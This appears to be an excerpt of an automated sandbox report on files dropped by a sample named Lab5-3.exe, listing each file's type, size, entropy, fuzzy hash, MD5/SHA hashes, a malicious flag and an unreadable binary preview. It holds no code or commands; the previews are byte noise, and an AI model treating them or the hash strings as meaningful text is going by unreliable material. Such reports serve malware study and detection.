                                                                                                          Preview:..4.-..v....'.F.....B..`...>.h83...y....1...O.....>v...........IG..ko..m.|.....).C....$xh.}Uw..w..2";n....$.....?J....F`........?.-y:.....#......".......2<.##b.....A.>.B.....4.._.P.....O...\...e....+.#[..]y.d...Z... .~.p_.b..)...p.,..5.K/.....t.b\..PiX......<..$G.....@K_..q....jHOl...*..ln.....[.........;......:..V..8@.... .u..d..%......E.1DC&1...T............zr.".....@4..)..T.V...z.D.q;c.d./.go.....N ......!..~:xT..y.(.-R../#a...i..kdcb.jRd...7...n.#.......8..v..r\do..f*.......l..*...P...U..y?.T..(S....Y...CR.6c.*Wb......H.......m.....>..%9..N.V.s&].y..2.-4\.........R9.F.r..w9..e.....9.V.8.B%%........I...k..;......N..O.>..y...%..F2.3..@ajQO....h....]y.i.IP.....#4.....C..k2.S..l.....cDr.v...V......O.n...Q.R..x3\sS.O0....\HD.0.m.4...P.,....T.w.....j..>.k.H...8......cX...#&..zc..\5.Vc....[X.}.....@.U.:>.u....]..M.C./N..7.$... ls......nS..T.\.z...Z.[;_dO..>.og@..l.w.g9...S...&.F......]..... b.....L...y...Wu!..S:....Ob.....k'...8B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2192
                                                                                                          Entropy (8bit):7.919642236359147
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WuVzqOkxKfczAu2qbgHfUTid3hBaUoSGFcmeykEdEElU92i:Waez8Yt2qzGx0uKeY2ElUJ
                                                                                                          MD5:8FE6AF9F880318010F3F74CA202C5316
                                                                                                          SHA1:EE0E56EF239B6BFDB2184A4A807FB59F6D4C6B57
                                                                                                          SHA-256:692D64B9752395680F6371FB73E71A9986D298A7091E057B2DDA272D57AC759A
                                                                                                          SHA-512:8ACC69F184686B7FFF54AFCBCDAF9BEF1671B025F419906C14D6F4308DE80EE105D608655554B8EA8027053A3AB946823080AECED9650803D11CA69AAFB2DEA1
                                                                                                          Malicious:false
                                                                                                          Preview:A...0..=..d...?..h...{\?<.0 .n.M...b@..v..M/:........ncJ.3p...A]B9n}...Ee....4.........>....N.S...R.4R.{m&B...>....G.q g...$..[..p.h..$.....!..'B.s....]k..My.j..@.p........;..l..\......:J.nKGB.jV....%.....D9..J..eD..3>J|^M..".-.F.%.....3...gy...X.6.h...XEX..._...Ef..q.0S..=.&"...APf...".9............]D...Z.....Y.[.MM..I.....QH.6.._...y....gu.6....M...%.P..3..V.....~fi ..E...p.:......../.~....F..X.q.CgN..y..... .i{....G]{...........H...E.,.....r{o.....K=uw...j.PG..c...E;..98...X...{.....\.(8{....!.?..$&.Q/.....G}....Az..iB;5..'..].....*...).+. @\8.......eF.1i......F...<..C....8...F....l.D.e.eM..G.z...gO...v.....lm......j.i!..........<;p...7.w.. ...1for......p...F#c..>.... .X....q...)....T....L..>..........1.....t..8....f..y..d..6.....F.''u...T.".:Z.^|1.!.@}xZ.X.......E..j..-p.N.;.<D.{./......kG...~...}......#;........-. C..z./..\.}q..l.[..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21888
                                                                                                          Entropy (8bit):7.992118235517205
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:2xT4kcZmoX5YesJmHMBRZkRcvzUyhtBeFbPBBo+QHtb:0T4HQs/OZFUqBehY1Z
                                                                                                          MD5:1DFE185466122A4E0BC0B5EA838BD8F8
                                                                                                          SHA1:CA75A46E295B75ACC0A39A71CE8E54EE3E5E0A29
                                                                                                          SHA-256:B3F7FE0F8851964E56E9AD274AB21A4C19AD8EA0EB69F48C9AF6AC4D2B5E7D27
                                                                                                          SHA-512:BFCC4C8E3E5998BCFAA9F8DD54A30C468BCCB517413B768399428C12B8ABADE74B93B31409E9BDFE7CBCD9F1918FC27EA0954BC61334FB845E8F8E186BE604B3
                                                                                                          Malicious:true
                                                                                                          Preview:Bb......8..t.....`.BJ.Cs>(As..D....F..i.z..PL....^[H.r....i.[$P..f.5~.....\9......#..-.h......f..I...U..2...q...........{.. .8....S.S.=......$rw8.)).|.%.E....q.yT..D.0.=..=D..y=.}G%y.<.2j.2..H*.$.t.......u...HJ...8,.d.X ..{.......r.(i..Z..|.^.K..M[..;....I.....@.(....pc.8....O..[..\.?..3eo..$j..Xg*.....Y.<k4|8g9.H.h|....1..m...].........4`...N_...,.?_.%...@..;. ].2Z...{...8.1..\....+.-....._.U..-""e%.}.....K...J....?-g...vA..LkK./z..w...r.$....>.|....pM.L....x]x.J..b~0.._.7.i.j.A0..+..r........vs.D..uc......{.]w..!.U.0..h..pg..C)70.o.G.{2.3'?....jii.?...6...... ..&..W.......sv!.i.=.......Kj.._n...lC_..z.<."7.o.#...1....c..\..p.-M}.cl........+.....pTd..A5w%U1e...;.....Z.~I.e...W.k..!....Wd#........ ..'... 3.F..,Sf%....Sp.}L..J.#U"..r..m..z%.C.?u]................XI....J}....qAIy....(............{...Y....Z.....u.9.7...,#...s}..2[i-....P-...(......CC........d.....S._.:tBE0..$.L..t/...8..Y.^..O.J.r.b.S:DU.l....&..X..F..~..?....Z.?...![1F.',.2...E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.9133748540618285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PAqpC2hYtBltPWwrHfUTid3hBaUoSGFcmeykEdEElU92i:N2BltoGx0uKeY2ElUJ
                                                                                                          MD5:400D5428C83E54F339AD41D38A305B11
                                                                                                          SHA1:195DFE8AABDB9D4E20FD84DE1A821E2A482B7917
                                                                                                          SHA-256:BF0F8187142B966945ACCCA20113E067A56400925F5DD7B18A91B596BD36B41F
                                                                                                          SHA-512:EFC322C4C21B10EA9311C3BAB9196A3A527B5A5818816B42A67E5E3A796417A3ED76B5343D9B3DD15E3981683A3F66369ADC3F187AC9926F4EDF86B783F2E28A
                                                                                                          Malicious:false
                                                                                                          Preview:......V...../;.Q.F...K.Z.d}>.Uq..%y.._H..~8.......q..^]P.Q.U..RY.N'l.....f.\...&...he......2....P.*P.j...%.x.W].3...O)x...^.e.x..D..........C.....hl.....K!.%F8.t.....X....iM.s9.E..=~.W1.]\.... .....k.?k...$V......".S.A.*..B)...#;r..m.C....r..?.Em.}.0...........O...{..F3..fOCQ_........v.d..XR.-Zo!T......[={...7-Ck....A.`Ku..*A...o':6....-....-...f....sc.v.i.&a..&,c#,&g|B.9j...Y..`.;...m.|...g..q.&p.A..:_..}H....-.9.RA..i.F.d.|S..n.g..fL.e...nRr....2.</..>;6......y{.m...W......jv..Y....vO..:.r....]M...8.t! ..3..-.:.x.z.5.=..U...=........u^05.b....3...H4;]....]<..OF4../.x.2z..f.(..,*.OR8s.z.!:E....K..w....j...b3e..Go.FB.S../.x$V..(...EI}....7.E^.6EZ..Jy.1.<s...W.;....Y...w...E....p..;....#u.....g.S...V.....r...a...1v`....% .b.._M..K.....lg....m...0.....3.1.b..s.=..!..............RWW...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5040
                                                                                                          Entropy (8bit):7.95976366170568
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:RE4ekuJftAsn2hq+jEAY6LQ8TbbQvvV+zPEhO+lGSVlzwWWi7aGx0uKeY2ElUJ:O7ws2rNYpobbQHV+zPgvIC0Cb
                                                                                                          MD5:B13FDC9C99B7F0750AB5F7446C74E909
                                                                                                          SHA1:6C9D5DE12F86896C82437B837011AA4551E92000
                                                                                                          SHA-256:F5634A3536ACDAAF22B947BA4C1ADA4B0EAE22E6C0EC81779FCC1263CEE5F696
                                                                                                          SHA-512:98DC19B0509E5E6DA7041BABBFAB62E0AE9513C9BFC72E973E245EE3660F1FFFD0FA869BE1E3CDDA7E67105AEF774161A6AD9C7F80D3AA1D94AC32FAEC61FF41
                                                                                                          Malicious:false
                                                                                                          Preview:._...M._+..'y..E.R6L.'.;.w..0m..3.{.J.._....>J.k.#..1.....7....af......As..=RP.....`..$..>G.G.:[.4..!..#....}H.E....@xWdX...!..n..c..b.}..>6=...(....(qq.O......'.(.Za....c.tq.......-..!.v.z. .[!......3...~.n4.4.3N.&)..R~..y.BI..@. .vr..N.......X.:...CY.y.o@.Hq0.......H+>....K.Qf....0...Y...X.g.9=.....<p..S.....[-f..Jv..D..".CG .-.X.Pi.43.6..rU....V.hO&..L2......H.jP....}j."..'...........%..w.^..BY..}..u.S."....i.J...S...e....H..Q..m.u.Ky.."../..b9...&|L.6la#B.X9.q.h)........a...y.A.s.P..gC...1......2.......y.....F|%.}..}q...!B..9M.....9..8..m.......5$]6;.~(n....,.A.,.xI...,..T..2;.+1i..~...G<UD*@7O...T.....l.n.#..vQb)....((wf......._,t!.s.v..0.....T....6..P<...Y>....F.7...@......|R...<(.Rn;4..m(.......Tp4..E.\k3.1P..3..9A.p..J...k..G7.^+...D....}...=Tb.,.........-......Odt.'..x....A..C....F..( -.F.R...Uj....]p...5I7.=.%.oF,.......h...8.t..+..b:.y.....Fi..b.xw1..b^.{&._..Ml...1Z.G.......C..p..tV.J.U..zZ...iQ.w..$Z...........&.0...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.910495178583937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/dmDidHfUTid3hBaUoSGFcmeykEdEElU92i:/gDi2Gx0uKeY2ElUJ
                                                                                                          MD5:3A3699D5C76896818BB93BB5A84A6ED7
                                                                                                          SHA1:9C19486341468B3002093CC463CCF88E18478C63
                                                                                                          SHA-256:EDAD8F6413B21662C4FA3E7FF9DF94D5D961F6141AB2FA6F682AC706F3F249E9
                                                                                                          SHA-512:0C1FB03F388617B9222E80DD9B473DB849571D9EBFACDAB7D49B01CE616471056586AD282188847F02D3A01A03B8C1C40D1A8D193BCA5510F650269C8AA84623
                                                                                                          Malicious:false
                                                                                                          Preview:wl..ej.....o..'..gE..+..".@......O...c9..O.G..O.....2...<.c.I._4.Hc....~%.Q....]...8.x..s..Q.....l...&(Zg.....b>g{.v!...;..jM[....4...E......BXyn}!V#x..Na...\..;?..'....g...O.<.k[....5...^...^.P@..o.....vu.#......0c.._.;.b..nb.......M3.0..s.8[.f"..N,.g.*].lY..~.....x.S.P....q...=........_6...r.`.n2-.k.a|..WZ..."...Cv.......R.?F.]j.......R.Q,...5.\RG...4L..g=d..|..G.?.h.1..J.=.h.Up..K.=.4..\P.......h.o....).....W......^....\........7.F.n=&..M........l..@!G.g..S}......B.I)..*.Y.....%xZ...n".37.[.L.1.F.U..6.o.....8my..a...L.Y.k....d..(..g..Y.iZ.2.e.L.aO6...I.tg*..2(....g.R..d....{q...%....B[.....Ty.O...X..>r.Z.7.].....,..6U-...Q...&.K.....ro...8A...h8..R._}....w.OZ9....%....O.....|.a.....#.`i..........6>..c...C]..+.2.h..j".......z6..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):7.908737953170167
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:afuLU+ll2SeHfUTid3hBaUoSGFcmeykEdEElU92i:zll2SxGx0uKeY2ElUJ
                                                                                                          MD5:9C50BC954822201B8A388C0C4E9E0031
                                                                                                          SHA1:6531BCBD7755720C65D658F1E13A03F1CFA2BA83
                                                                                                          SHA-256:73A0B0E26FE8238C574AE0163EF87CE4BAD69A17BB178CA157B42CE35A87F5F3
                                                                                                          SHA-512:69AAE17ADE215D2BC5C843A18F1A712B7DDFCEEC90F2F527393807AEC9DE5FEC3991C92EEBE5BB093AD70DFDBD0F1B7AEA9EBEBDF6348F09B5AB4FE283593E30
                                                                                                          Malicious:false
                                                                                                          Preview:F..G.;..E.F.H4F.....Z.O.~.'".m.&J....?t.;...\....R..B.M...Q..........*..........v....-...'.z....;....o\r.+....^#x...el8Z..#...1[|..C#.m6.Q..C5..`0...%k..@..a....0!...~/C?..k.v..d.E....u...A."b...x.,.l/X.....=.......J0.. ..BB7q..UI..]c.......u.....E..........&.k1...[..wW\H..y{.s7I....`my~t(...>....h..y....L......plg.\. ..].z.#....Cb.+.R.,..c.&..R.a...h.X.v.2.".....R.I.>n".YxL1.z..i.E...NP..o....0.%.O8.r.X..V..1D....P...L......$ji.l.(j.....*.74......W\?..h0.....D.Q..?{{...j...z..v^h.X.r=T......+I.....YQ.x...........&..no9/..fT,.z.%....a.'....f....6.......,......T...b...uX/./+.s.H........k=~i.U..F..N.9q..9..$\~.h...$.......}..[..E.Cm.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2288
                                                                                                          Entropy (8bit):7.921935931074501
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mcGtVrR0BCTMHfUTid3hBaUoSGFcmeykEdEElU92i:zIVrYmLGx0uKeY2ElUJ
                                                                                                          MD5:4236E61C8411257C4AA2CC48EAC57A9D
                                                                                                          SHA1:C16520B5631FAF4ACDFBF43C8337B1C80754AB52
                                                                                                          SHA-256:D2AF1B58146312AAA9A082318FEBABFABEB8D5C9FDAA77D6630717E65BA6ED90
                                                                                                          SHA-512:2828BCDCFC41625549B74B38330B922D58C177CE4637541C7D3CF9AA8898CC2884AE8AFF3217B6B2F04485CFC2415968155165792F7F6AFA11DC735F13A3442D
                                                                                                          Malicious:false
                                                                                                          Preview:8V.P...]y'Bk...?..e..=..8.+.....i!.j...K......}...*r.g.v...%..tbK.b.).#...a<.R...x.z^.%'..>\.q5.x.....h.1...%...._.....]w....>Z...).....!R........!.'../..N>7..g$`.E.J.l..xA.^...j.t.|L.._..#....|.9....1O;8.SK..Q.r.O.w=+..Y?...._[.X...r..PW..2^O..0....0NY...@O....@..E<.....}...J[<.Y0bR......_~s...3....H....y..JJ....S..........r..f.9a...a......}...4.#&E..5.s..^....F..o.9/D....X.cu......3.d4.@.:.rN.Z .E.:..s..6....I..@hG...[U...p#..sT.2...T....Z...1..S.....{...DE.....\y....#.w?/7.eZ....`.AEx......h.M....~4.....-.."}....u........W.U......A...-(.b..f...\v.....>V.y).*...<5...eZ.-.......},...`.[.#&.M.j.A..}.(.b.....d.....I;..Abw.^r...T#x....MlF`.U..e..+...@...?E.{.)..Q.Y..(..-....4e.5...u..zO.Y.D.h.q...rI.....xHx.h.f..9e....".A.k...^>$...M.[.P....p._2.x.g........'. ..}_....p.Zh........)u=6X{.y....'>..iR....j..G......"...'?..e.9gb._k.0..$er.+..-..*?8..GZ..w.0...F..8...2.j8^..h.}...l.`...#...}.[.}..>W!.e..5s./...V.#rI#O..k'..W:...^.Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2304
                                                                                                          Entropy (8bit):7.9022257251150965
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XOLacC8wEhuZlzVrHfUTid3hBaUoSGFcmeykEdEElU92i:+L1C89uZgGx0uKeY2ElUJ
                                                                                                          MD5:4F71BBC99CF974E6306150A0ECFCCE05
                                                                                                          SHA1:5814267A4AE694FE3DC9F4220369C18CB9AA7366
                                                                                                          SHA-256:58B42115A2A82C5DAE8B28B1124BFE699C02C05166101DE858883B1D22B4FC90
                                                                                                          SHA-512:38BA5F36578F826B133A29C384BB6B597C2177E691C04DFC4C308CC0A4F64DB5AB2B82CB3399444E0F127417128A91A0A47E65B95C8A0B26E6E5FFB8484AFD4E
                                                                                                          Malicious:false
                                                                                                          Preview:W..K. .(..\......L..{`|1XJa...#..:0bbK7a....#az2#.+..,...g..L4%.y..r4P...b1....S..8..f{&......{..#..`....W...)lL..+.#.9..<......B{'k&..W..T...q+Y.-J?.2!...m.....{..2..wWU.lv4I....z6....-8..../.q..\Qn....!....:.|:c.[.-...I.H...@........-M ....x2..Tv\..v|z...R...$.g..X.i....$...0.pP..d...........G....4...S?...S..D..=......<.`..i1w.l,..7.}P#....(.).9B...Ug.....R.1@2?..fc..d.s8.B%.B......#.(Y..dl^Q....,...2.L.7........0Y0.#`s. l..*..o.M.;........I......BA..B..8-.P....fS.)7..3l....P7...6.G.....7.....=yP..Z.HO.H..P.Z.... .zI`...O....Y...z......o.#*v?.$.....F.UH..R.M9-Se.^...s.K.........|\\O?.F./JOC%..q..v...L|..z.BQjm.........c...y.,'...q..........~.w..7.M..5.'. X....no!.......i.7..o...v...S..n}...:d.`.;.e.5......{.J...2.V..2w.\..m........L.....A...(K.5....n..$.P.....G@]G..&......w.c..B..b..O.^.."Q...K.Y.;........Wn.$..`:.[........k...o..G.|...].U.......H`T...*}'.C..qi.*.a...sXt\..5x.*........} d.(.u.0e.a...PNp5.bh.M........|l54..g.....:}....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.90826604304019
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:a6vKzLvwAYpLNOl0jPEvXRHfUTid3hBaUoSGFcmeykEdEElU92i:NK/XYpLNOlGEvSGx0uKeY2ElUJ
                                                                                                          MD5:FA07135340E1947F220FE682D3B5592E
                                                                                                          SHA1:7AE8C6A7215E4DB52377950697B3B74523922278
                                                                                                          SHA-256:90C4F4B2C514CBFDE5B2AA71B468D41CAAE9ED77D254771FF6F77389F148352E
                                                                                                          SHA-512:1F8E18C74C335B9C434B1BF811E99CF39B80EB896BD83CD569553BF47E1E1A45B946B0D29218DC00F8B26365BC800701FFAA31790E9620C4C1B5A6F9453F20AA
                                                                                                          Malicious:false
                                                                                                          Preview:.|S..h ......-..."."e...).....I..~e...[/...Zo..X*JTM.......|.....b.u>S.v~.{G.5j.......7(,..lTs...I..z..2s....^...p".h{h..-...'=..3.......?....y@b.V$......m.l.7...).m.B.....C".W.*...p.ZB....;q......_.0.......X{.Y...y...'E.*..X..`.]..%.U..6A....y....#.8.2qt......Z.D..o;..v.......7r\.w0..Y.....f}...5..?.._K+!.i%+.....f;....59/....~....z..w...+E..6....W.3..$.....t..i.#..j.Vi!..).F.-..}...j..j....7+w..1..ec#..>...V...kCgN...0...q+>...s..y.X.... !...(...jl...7^A.|.i..A^..zj.x...a.h..`.d.2.r..-~..~f.....(.>....pZ.P!=V[....;..2..(G.$._M.........J..-..../3.*.U..o.}..fY..b....S?..4>...YQL{.Z..+8..&..+r......Z....#j..,E2.l...Rr..<`.i.rN/...p"...V..i.V.v.....H.I.yA....}.._.*.,..E..I.tjK...X[.i%..&F.].W....W.H..N....e...%/.*o...r.fy>.>4..J..yZ./.%...M.#2..E.2....ilh...../../......}..D)..\...V..".....$...j...#...E.....^9... ..tT.....#...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5536
                                                                                                          Entropy (8bit):7.968189841460302
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:GYIgnBu9yfeVGfeDTvCMqdW8e48OUP9GEmu87g6GzBGx0uKeY2ElUJ:Ygn4wfeQfSbCMqxeuQYc2C60Cb
                                                                                                          MD5:3A52D7F798360E4C0ABFC816315B55F9
                                                                                                          SHA1:C2EC4CCEB09FB7A1140AC3E8D8014102F558F69A
                                                                                                          SHA-256:FFE2BE2B7DF7EB83FE77BC08B8B88A19B22E42D3904B5E72EF90F436B167740B
                                                                                                          SHA-512:4FAB1215F283F56EF7528A0084AEA5DD08D50519A377C08E1BD55897C9A815899B3167686A38C2AF2EFF424BF75F0E24F746312F811A19CC2B563A45FC47DD8F
                                                                                                          Malicious:false
                                                                                                          Preview:H..l.V.wGw......C.\.k...M....-/.g..B... O..6......#e.......Do..(.&:.H.C.........E....9...AU....y#.yl.X......jZGFyb9.....g,i.z....m.{......N.p.b..po..d.0....".W..I....}...4U..tS.:.CY....-kV"...M.k...f..pDa5|).PB.!....1../....V.-|3(.J....4x9`M.V..3..y.&,-...56...{.>..o..%......B......3I*q....KN0.?.....MI.a.&'.x.Y".....b..]......K.D..UBUQ.P=....:...R.U,x.Ad.Jy......./)9..8..Pi..;....|..7.%hq..t[=......R,..'..;/V."5.9.r....^.)ua..F|.I..U.Gz..q.#..........cg.A.4..i.yf0{..B...-.[.1H...|...%.W.8.0m...)...wJg....Lu.l...oPs..s.FIR..t.....'i..L........7^..D{..X..V...].K.o...Ri....iV6*s.X[sk.~}N=.............L..+U.0@[.p..5.mBy....n7..X..x9..`..9.B.srf..A.?g.._..4..:a...ar.$....8..h$.X....w........*..,...0.dx.....Bu.[.......R.....G?U.~...mS..D./..%...T.P#E.....(.......3.;.XX+A/T.o|t...O2V..*....3/.V......x..L<.q..(.}.^....6.@,..Wb].3..Zi......B.....U.......^?'F.<..*....h!.....i...%.k[.'n...[....cf.../....1..........Xx..9..Q0P...#ejM.{.+.|............9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.912850949501519
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4sDCzCJPsl2T8cBswwhzHfUTid3hBaUoSGFcmeykEdEElU92i:4sDCOZE2gcBzw2Gx0uKeY2ElUJ
                                                                                                          MD5:9AA3DD726C56BF6DC36FB0AECA5D898B
                                                                                                          SHA1:8DFB8BB6517E86E29C398BC47F826B4FF8BD5D7B
                                                                                                          SHA-256:4C0DE7B0C84E9CDA4D8A1645EA9AE710D97B4B0C5671A883FC59BE59B342BBBE
                                                                                                          SHA-512:9DF79E81F6F748BA669D7AD31143809B214EB93E94059685CFC25E5F54871EBE09D13A67EC20662CE6B23B9949FC0B3444147DE36C7E97A4C69804BF1D7DBF64
                                                                                                          Malicious:false
                                                                                                          Preview:2.T.D.c..7.}Y(X.9...M.....*_..V=...Q@-.4H_.$R........`X....m..dO..U[..6.C..pzX.6A.....ET....f,.Il.F6.....X.R.N..L.j...d?.8T.&Qn.I.%lzv..k.}..+..M."C........1...vqO.0X[&...X.."...:^.,(R....+.'[.v..D..6......vo..dw.Nw.....1.\?...DX.u.Mj.f.i.Sl..B.....[2<....m....1.h..1B.u..<..R.E3..cH.]A.m.6...w.<..}.....7S.[+2...Cn.09e..4.M.&.../".oo.]..T....,}#...*..:.=..*~b.......L.u..CkR../p=.<9i...Xi.71.|f...f.0t.....t.e.=M8..k.YNjO=w..]...?.+...pL5....7..c+.0.(....~.C....O<.#.@v..V...l<.^Z..P....M.:A..;Y..}......E...p.e.36D.E.G.V.LL[.T[..Lw..5..D.......1e........g;......@..|...[....U..=F.}#&...:..S.A..n..p..Q..Ty..q....)i...b....bS...t..t{..............?...?..P...)g.V.E....R...........1*.T.d...+...D.z.W.Sx.raY>..Y.5.S...u...P.......X...?....D!.M..m,9D...p4......2=...t.J.]..R...............W.<......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.910864048461897
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:E3044aBVzhnnBtNTZ3s8V9HfUTid3hBaUoSGFcmeykEdEElU92i:E3044aFnBtJZ3+Gx0uKeY2ElUJ
                                                                                                          MD5:13115A60CADDF04655480757F5234F84
                                                                                                          SHA1:CE5D7D85CAB7C566A2ADC8C40ECFF1014D71BD81
                                                                                                          SHA-256:A58CCA049BC8BE19A1F5DA8584DB21064425EE6384C28AD51DC568E22FE72D2D
                                                                                                          SHA-512:6FD20CD21DF5CC116C774DD124475EF7E8A897D8DC252D47E4D1A9F0AB4D997FAD1C4813B9633B88B5490D4A0C9FD4DBB7FD0B13D6FAD70BBBA288DE9A123E00
                                                                                                          Malicious:false
                                                                                                          Preview:.$...c.@6K...A*;.:....(..'..l..~..R.J...m...v.....[...]C..&..F.{KM.S..%......N.?..78>G.|[k.l...EE...GFg.&RI.E..M.x.......2....}./....ORLi...i1.:.RmV................`/....b..NP)...V.3............?>........[.@g-.....Z...;..t..F.yc....zU.#<..Q.S..y..........0;.....d.I.....j....9j#Vo.LZ...t.5j.....!..hP.mUa1.P.... 7..J...3......s&.pE.....+..j'..;E.:^...._.....lW.\cI...Q..4Pq..nr.4..Q......G<dK...../...i..%.I.FAM...).....t.(...TK@.:]..I.......3..s...s.............7qLA...rG.....c/=.i..s..x.v.>!.t.....fY...]c......?eL.g...W.-.4.b....B/D........J/L..F.9...U.=K.X....i..2t..=...?....%6.X...rR..Z.:.:.d.p'T..p&......We.v3[5.....Wd...bA>...x.c...].....^PV......o.ec..~...w.O..!...}w....].7.E!X.b.......]U..-....AC]C.@..\!......R...R.-..l.~.....B.N.`T..F...+.........Ff....:..1.86@.z.B.+L..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.910186554331123
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:L29scqHkY+26mEJxoRVHfUTid3hBaUoSGFcmeykEdEElU92i:L26cgz+ljr6uGx0uKeY2ElUJ
                                                                                                          MD5:28F998C88A92E565A58B84CF53D18D42
                                                                                                          SHA1:61267AE3039CF5CA5BAF155BBAFECB5B1E8E027A
                                                                                                          SHA-256:032D586AAFF20927A418170C43FA1BC7EE8721513EA294C0F16107C5AA63E6E3
                                                                                                          SHA-512:A6E1F837D52F13A5056B49BB1440A380D355F9A17EF33DBAD6470F2CC96122C56F2F7D4ADDBE8FE70A2EE01966DDEEF9FAD118DCA6D19020BDB582F1EE87F464
                                                                                                          Malicious:false
                                                                                                          Preview:...B.d..)........!RNJ,'.......$Um*..[...V.22..a....)..7.}...d'@.k.m.n%.E..m*....X.>[^..|r..,.\5.H...0sVi...[ha...(..u*I@.f..GspO......8.<....s.].<F..........E.(..d..^.gA].k.y]C.M#......i.....}...Qx^.4..X....uBG..a.W..X}.$..QX@.`~...!.x2.eD3~....S<.:..(........"...^KR...O.YwF..+..5Et.`.b!,..f..M.~.B..NN]Ld.i......}^....3"....2X.........5...W..[...'.4..n'E..5....Ta.o."..........W..H@..".(Y.T9AbJ..3{....0,..`f..vs..u.Z.....-[T....8KD.9w.#...6..B..._.._a.....!..fX......L2..g.X"|.....^...OJ..QD.....X.......V|}i..r...R..lJ"..g.._.4=..~}.(.2v.'.nt4J.+{7.=.."..@..j.X}.F~.....^N_@L.kSoN.].|...m...EgeH...e..:....9.%L.S.e).=..8k..2?.......1".J.x.Vd ...y|_t....}..?.)....E...$..,,i4/6;.P.%y..0.....r.<.......v....f...Jm..0Z#..a(_..m.@..a.i.u..t\Rh..^..OE...6....T@..z.<^.@uW...p..}.li...1*..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.929685639406687
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:avtQ4YwVES8wChCA6lySIh1GCK/JHfUTid3hBaUoSGFcmeykEdEElU92i:avtXQdwcDSIh1e/KGx0uKeY2ElUJ
                                                                                                          MD5:B1D35FACE06A84B5B79324F427205A38
                                                                                                          SHA1:7A62EB7ADEADC67046ABC33D7284449876680AA5
                                                                                                          SHA-256:F6EF11F6D242127373B9E38C7FC2609978C882186F0192F28FFDD2F525360D27
